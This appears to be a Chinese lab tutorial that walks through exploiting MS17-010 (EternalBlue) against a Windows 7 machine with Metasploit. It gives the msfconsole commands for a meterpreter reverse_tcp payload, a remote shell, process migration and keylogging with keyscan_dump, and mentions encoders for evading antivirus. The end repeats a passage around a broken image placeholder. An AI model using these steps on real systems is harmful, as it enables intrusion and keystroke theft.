Metasploit使用-复现永恒之蓝漏洞
MSF是渗透测试领域最流行的渗透测试框架,其中msf为总模块,其他均为分支模块。分支模块如下:
辅 助 模 块 (Auxiliary,扫描器),扫描主机系统,寻找可用漏洞;
渗透攻击模块 (Exploits),选择并配置一个漏洞利用模块;
攻击载荷模块 (Payloads),选择并配置一个攻击载荷模块;
后渗透攻击模块 (Post),用于内网渗透的各种操作;
编 码 器 模 块 (Encoders),选择编码技术,绕过杀软(或其他免杀方式);
所有模块位置:/usr/share/metasploit-framework/modules/
渗透步骤(Exploit)
search xxx #搜索某个漏洞
use xxx #使用某个漏洞利用模块
show options #查看配置选项
set payload #配置攻击载荷
exploit #执行渗透攻击
复现MSF017-010(永恒之蓝):
准备两台机器,一台kali,一台win7,win7需要关闭防火墙
进入kali,切换root用户,查看ip
win7:
确保两个网络在同一个网段,ping一下看看能不能ping通
能ping通,接下来启动msf
msfconsole # 启动
search ms17-010 # 查看漏洞
use 数字
info #使用info查看模块信息:
set payload windows/x64/meterpreter/reverse_tcp #设置poc连接方式:
show options #查看模块需要配置的参数:
set RHOST 192.168.125.138 #设置参数:
exploit / run #攻击
back #回退
选第一个即可
use 0或者use exp…
set payload windows/x64/meterpreter/reverse_tcp #设置poc连接方式
不过可以不设置,因为默认就是
查看参数,showoptions,required为yes为必选项,rhosts是被攻击的靶机(win7),lhost是本机,注意rhosts上的端口要开放
下面这样就代表成功了
比如我们想获得win7键盘输入,
在meterpreter输入,key两次tab可以补全
但注意,这里是system用户,而win7是soul用户,需要降权
这里先演示执行命令,等下降权,为了方便:
#进入dos命令行
shell
#切换编码,解决乱码问题
chcp 65001
ipconfig
exit退出
ps查看进程:
看到cmd.exe
切换成功,win7随便输入,keyscan_dump
成功,到此结束多次exit退出即可
35178348957)]
切换成功,win7随便输入,keyscan_dump
[外链图片转存中…(img-glSqEfaM-1735178348957)]
成功,到此结束多次exit退出即可